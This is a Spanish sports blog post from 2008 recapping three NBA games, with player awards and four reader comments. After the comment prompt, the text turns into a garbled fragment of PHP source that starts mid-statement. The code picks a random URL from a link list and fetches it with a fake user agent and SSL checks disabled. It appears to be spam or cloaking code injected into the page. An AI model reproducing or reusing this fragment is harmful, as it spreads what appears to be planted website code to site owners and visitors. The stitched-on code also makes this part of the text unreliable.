La crónica (28/02/08)

29 de February de 2008 por telekoman

La pasada noche nos dejó sólo 3 enfrentamientos y algunas conclusiones. En esos tres partidos vimos un enfrentamiento que se puede reproducir en Playoffs y que ganó el que tuvo más oficio. Vimos también la confirmación de que los Lakers apuntan a lo más alto consiguiendo la décima victoria seguida. Y hemos visto también como los Nets se agarran con uñas y dientes a los Playoffs.

La crónica:

DevinHarrisVsBucksEl primero de los partidos de la noche enfrentó a dos equipos venidos a menos del Este. Ni Milwaukee, undécimos, ni New Jersey, séptimos del Este, pueden decir que este año esté siendo bueno, pese a que el marcador, 106-120, fue elevado. En especial Milwaukee, en una posición incompresiblemente baja con el plantel de jugadores que tienen. La tripleta Mo Williams, Redd, Bogut no hizo un mal partido pero estuvieron pésimamente acompañados. Entre los 3 hicieron 79 de los 106 puntos de su equipo. Los puntos de los Nets estuvieron mucho más repartidos, ya que 6 de sus jugadores estuvieron por encima de los 10. El más destacado de los Nets fue Devin Harris, que en su debut con la camiseta de New Jersey anotó 21 puntos y repartió 5 asistencias. Carter y Jefferson ayudaron con 19 puntos cada uno. Interesante la lucha en el puesto de base en los Nets entre Marcus Williams y Devin Harris.

El enfrentamiento entre Dallas y San Antonio resultó mucho más igualado y tenso, como corresponde a dos de los grandes favoritos del Oeste. El equipo de Dallas no termina de dar con la tecla para ganar con los grandes y como pasó ante los Hornets cayó derrotado pese a las buenas actuaciones de Kidd. El nuevo base tejano repartió 10 asistencias, pero su aportación anotadora sigue siendo AloneWadealgo escasa. Nowitzki volvió a ser el máximo anotador de su equipo con 28 puntos, 17 de los cuales fueron tiros libres. El mejor del encuentro fue sin embargo Duncan con 31 puntos y 15 rebotes. Tras dos tiros libres anotados por Duncan que dejaban el marcador en 94-96 a falta de 34 segundos, Dallas tuvo varias oportunidades de la mano de Nowitzki y Terry, pero no fueron capaces de anotar en ninguna de ellas y el marcador final quedó 94-97.

Fácil partido para los Lakers el disputado en el Staples Center de Los Angeles. El equipo angelino ganó 88-106 a los Miami Heat en un encuentro que dominó de cabo a rabo, ganando todos los cuartos y en todos los apartados del juego. Ambos equipos tuvieron a 5 jugadores por encima de 10 puntos, pero en los Lakers, tanto Bryant como Farmar se fueron por encima de los 20. Especialmente sangrante fue el apartado reboteador, donde 4 jugadores angelinos se fueron por encima de los 11 rebotes. Pau Gasol contribuyó a la victoria con 13 puntos, 11 rebotes y 4 tapones. Partido sin historia que permite a los Lakers alcanzar los 10 partidos invictos, seguir líderes del Oeste y situarse a sólo un partido de Detroit.

DuncanVsKiddNuestro MVP: los grandes jugadores sacan lo mejor de sí en los grandes partidos. Tim Duncan dio prueba de ello con 31 puntos, 15 rebotes y 3 asistencias en la victoria de los Spurs sobre los Mavs.

El rookie: nos tememos que hoy queda desierto el premio para el mejor novato dada la nula trascendencia que han tenido los dos únicos que jugaban, Sean Williams y Jianlian, para sus respectivos equipos.

La sorpresa: atraviesa un gran momento y por ello no es tanta sorpresa pero anoche Jordan Farmar llevó su máxima anotación como profesional, los 21 puntos logrados dos noches antes ante los Blazers, con 24 en otros tantos minutos ante los Heat. El base de segundo año anotó 9 de sus 14 tiros, atrapó 4 rebotes, dio 3 asistencias y recuperó 3 balones para volver a encabezar la segunda unidad de Phil Jackson. Mención especial para Devin Harris, brillante en su debut con los Nets.

La decepción: Con la llegada de Kidd, Jason Terry estaba encontrando vías anotadoras con cierta facilidad. Anoche no lo logró y falló 8 de sus 10 tiros para 7 puntos. No presentaba un porcentaje tan bajo desde el 26 de diciembre, cuando hizo 0 de 10.

La canción: New Kid In TownThe Eagles & Dallas Mavericks

En realidad el chico es ya un veterano, y en realidad no es nuevo en la ciudad. El retorno de Jason Kidd a los Mavericks, equipo que lo seleccionó con el número 2 del draft de 1994, genera dudas pero también ilusión en la ciudad texana. Cuban ha apostado por el corto plazo y ahora buena parte de la presión recae sobre el gran Kidd. Como cantaban los Eagles…

“There’s talk on the street; it sounds so familiar
Great expectations, everybody’s watching you
People you meet, they all seem to know you”

Os dejamos con las 10 mejores jugadas de la noche:

Comenta

4 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    ¡¡¡¡Más, queremos máaaaaaas!!!! Grande J-Farmar.

    Tengo la intuición de que no tardarán mucho en llegar los ‘out for the season’ para los jugadores estrella de los equipos de abajo, que buscarán mejores posiciones para el draft. Lo digo por Wade, que dio una imagen horrible anoche.

      Citar

  2. RusticoColorao dice:
    #2

    Increible, como le ha cambiado Pau la cara a este equipo…¿qué partidos chungos os quedan Magic?

      Citar

  3. MagicJohnson32 dice:
    #3

    Quedan 3 contra los Mavericks, el primero de ellos el próximo domingo; también el penúltimo de la regular contra los Spurs y, sobre todo, 4 partidos seguidos fuera de casa muy difíciles, contra Hornets, Rockets, Mavs y Jazz. También recibimos a los Hornets el 11 de abril, justo antes del de los Spurs. Algunos otros complicados… 2 contra Warriors, contra los que jugamos dos noches seguidas, y uno contra Raptors.

    Curiosamente, quedan los cuatro partidos contra Sacramento. También 3 contra los Blazers, empezando por el de esta noche. Clippers, Memphis, Charlotte… vamos, que no es un calendario duro.

      Citar

  4. RusticoColorao dice:
    #4

    Humm…si Phoenix no despierta, que creo que no, al menos el primer puesto de la Pacific lo veo vuestro. Pero claro, viendo como está el Oeste no sé si eso lleva un cruce bueno o malo…

    La verdad que esos 4 partidos seguidos fuera de casa suenan bestial, algo menos tras la lesión de Yao y con la adaptación de Kidd.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>